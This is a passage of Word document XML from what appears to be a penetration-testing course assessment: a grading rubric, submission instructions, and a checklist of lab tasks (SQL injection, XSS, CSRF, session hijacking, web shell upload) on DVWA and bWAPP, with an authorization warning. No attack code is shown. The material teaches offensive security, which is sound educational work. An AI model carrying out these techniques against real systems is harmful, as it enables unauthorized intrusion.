          <w:p w14:paraId="2EFA14A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Inadequate or missing sections</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7B9E3B5E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Technical Understanding (10%)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794"/>
        <w:gridCol w:w="5172"/>
      </w:tblGrid>
      <w:tr w:rsidR="00000000" w14:paraId="1F979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87A7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5D5FD24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012782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Criteria</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="3443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EE3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Expert-level understanding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E8EB5A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9-10%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="73DB046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Demonstrates deep knowledge of vulnerabilities</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="358BE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B10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Strong understanding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E3DAD9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7-8%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F39555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Clear grasp of concepts and techniques</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="6CAAE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C73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Adequate understanding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="17F3D28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5-6%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7FE0C32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Basic understanding with explanations</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="3A20B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580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Limited understanding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="28D0D56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3-4%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E9736D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Superficial understanding</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="1B173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F53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Minimal understanding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1180666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0-2%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="05E41C1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Lacks comprehension of topics</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="63B0099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Assignment Due Date</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736BCB0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Submit all deliverables within 1 week of Lab 5 completion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0959A79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Submission Format</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7EF4B1" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Create folder: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>Week9_Assessment_YourName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547E03EA" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01690B24" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Penetration_Test_Report.pdf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DD2378" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Evidence/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> folder with screenshots</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA67FB1" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Scripts/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> folder with any exploit code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317DB172" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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README.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> with submission instructions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0D3DE7" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="00A65FA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A65FAE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="2012396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D0C9871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 Completion Checklist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0740F282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SQL injection manual exploitation completed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A41554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SQL injection automated (SQLMap) completed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED328E1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SQLi findings documented with screenshots</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D43920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Reflected XSS attacks performed and documented</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A03DFE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Stored XSS persistence verified</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03770A0D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DOM-based XSS identified and exploited</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C940DC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CSRF token analysis completed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC9EAE0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CSRF attack HTML created and tested</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C445AA1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Session cookies analyzed and documented</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6555C8B9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Session hijacking performed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27025353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File upload vulnerabilities tested</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F436322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Web shell uploaded and executed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773EC9DE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Burp Suite Intruder attacks completed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED34488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SQLMap enumeration completed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F8EB0D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Comprehensive penetration test report written</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5E1CCC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Evidence gathered and organized</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E83BE76" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="task-list-item"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19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Assignment submitted in required format</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2E948D" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="00A65FA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</w:r>
      <w:r w:rsidR="00A65FAE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="4797BC0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905BD57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Additional Resources for Further Study</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C3D7D7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DVWA Practice Pages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E02DCF4" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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SQL Injection (Blind)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE34241" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Insecure File Uploads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F716146" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Insecure Direct Object References (IDOR)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BAD93F7" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Broken Access Control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D126D41" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Weak Session IDs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F640A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bWAPP Additional Modules:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401A87E1" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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HTML Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54DB9456" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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OS Command Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D679AB" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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SQL Injection (POST)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D06411A" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Broken Cryptography</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23FC7430" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Weak Authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2702251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Study Recommendations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18559A0E" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Repeat labs with Security Level "Medium" and "High"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2703D57E" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Write custom exploit scripts in Python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59220469" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Study exploit databases (Exploit-DB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09100E7C" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Review OWASP documentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48085276" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Practice ethical hacking certifications (CEH objectives)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0250412D" w14:textId="77777777" w:rsidR="00AE7002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Important Note:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> All techniques demonstrated are for authorized educational purposes only. Never test vulnerabilities on systems without explicit written authorization. Unauthorized testing is illegal.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00AE700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A9C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="131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31A1C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="91F0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906E4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F312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0E160B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BBB24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9F6794"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EFE6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A76DD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8524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DC1321"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1C5E93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411636"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B400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CE4295"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3D7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A173E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A874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2E5C7B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="28CE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911D5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A5B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D346D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F33C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5A2E7B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9E9C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52EE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="78E8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B55976"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BB7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322271"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2298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5B3319"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2A7E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2D410C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="55C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9D4AAA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="20F2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AC641B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="46D4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BE1F9C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D146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24020E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F8D8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1D37A2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1366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3C6BB1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4AF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A238A6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E9D2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142FBE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AE6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BC346F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A04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2B5483"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F232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225D76"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8A902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A157D1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7D8C0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403BD2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="33B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EE3503"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C3C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01303F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4DE6E1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42F74A7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EA1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6F2020"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2FD6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4B93EF9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="35D23E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CE4A00"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="59F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1A315B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="59C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A45B28"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BB72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DE1ABB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="80EAF0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0C7916"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3C9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4C2164"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="48E0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5F724B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="041A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EB3D6F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0818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8576C1D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C158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8A5214F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="19EE4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8C575D4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3670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FB01C6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="61DA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1E54C7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4686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784493"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="092E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FA374A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8056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B0A7564"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9210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DA22B3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D23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F65102"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E13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C872D54"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4B626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CDF4292"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="15A4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710621"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8662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263D69"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="466A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524B3A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="792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871D4B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DC80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BF6C5F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9822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1526D89"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BBFE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28D33D3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BF22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132FE9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="70C6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9927C8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="99AE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011536"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="ECE4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1F7E5D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1A8CD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7C9762E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4E0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DE2927"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CD9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0C04D1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CC94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83E0C62"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="99F6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89C2B4B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3B1A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612126"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E8B2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BE6D5E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D7FA43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BF62A3A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="596E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C014D5A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7D1E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CE803D0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DACC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CEE647F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="380C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D746935"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D680A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D764F01"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="200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F839E9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9B18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03F286E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="72A6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29A690A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C3B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2D12FC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FF4A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AA4456"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="942A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3B72388"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C3E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B54E5E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="496E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5A379EA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AF0C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89A39BA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CB34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91B0CAC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="93F0E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9A828F2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0630C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B672B22"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CB42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D680A20"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="30B60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E044D43"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A218FD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0844C5E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E762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D1381A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1E3C5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49379A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BB6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666BC6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C29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9B4EA1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8CFA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3FF48D3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FAC4C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B069E3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F6943B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4D44571"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A832F3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3F418A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1C62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EC2677"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AC28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2A019D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3EF4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9F7887"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="614ABE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6E46268"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FBD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68169D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="688E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81B024E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="259C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85B10D5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DC5C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65023B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6C0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F165B4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D742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A8211A6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="99FE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B9C7108"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="040A4D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C675CF7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="503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270E07"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B3EC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D557C6B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C07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8258E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E33C35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E43336A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3C0E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F5D792E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6D5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CF103B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="92A6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0A21AD4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F49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976525"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="176C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F95F22"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E17261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3262E9B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4ED2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3C5780D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="95BC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45931D7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="82EA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47E3BED"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4DAAC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53F0FE7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A886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5C82B8B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4E90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BF28AD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4AAA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7EA79F9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4B684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8502EAC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="89E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B2389C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0742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9D4760F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C044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A856458"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A52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C213C5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2CCC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B911ABA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="131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9975FD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5D0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B40A12"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1A96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E2337A0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6FA8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E2F073B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="47DA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F2B3633"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E26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B37AB3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FB34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10727B2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="263C2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1250E3B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="33D8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2756876"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9EC4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29E0F06"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2518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4682EAD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B46C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FE3BEE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CF22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50C3CAC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8E7A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5234421"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E0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7491A31"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0D9C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B430B1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="82BC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8CA5AC0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7CDA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8CD5DAD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="243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093914"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E54418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9411DCC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8926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9F82844"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C258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A8F4DA7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A7145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B33576F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E6A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665D65"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7130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DD95CD2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="52A055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0573A2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DDA6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EBD2ABE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0416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EE05707"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D8D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006A7F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AF2CA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14C5152"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FFBC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1993E61"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BF7E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A93E20"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="20FA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1D663B0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="27E255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21842B5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C30A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2951F7C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1D40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32B0BE1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D81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862E0F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7114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3CC3244"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="495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4287EB4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="07B02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4AA664D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C84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A60BB4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="756872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1D70AC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="92E0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705B66"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3AC0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7C2125"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A48A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9312B47"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F7367F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99F2489"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BC4A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A2A7B97"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="678A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A3F1D8E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2BE08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AC05A8E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="619C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AD34440"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FE664A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B4435AA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FFE228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B537456"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8EC8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BB11877"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="693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D450770"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="25B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585B28"/>
    <w:multiLevelType w:val="multilevel"/>
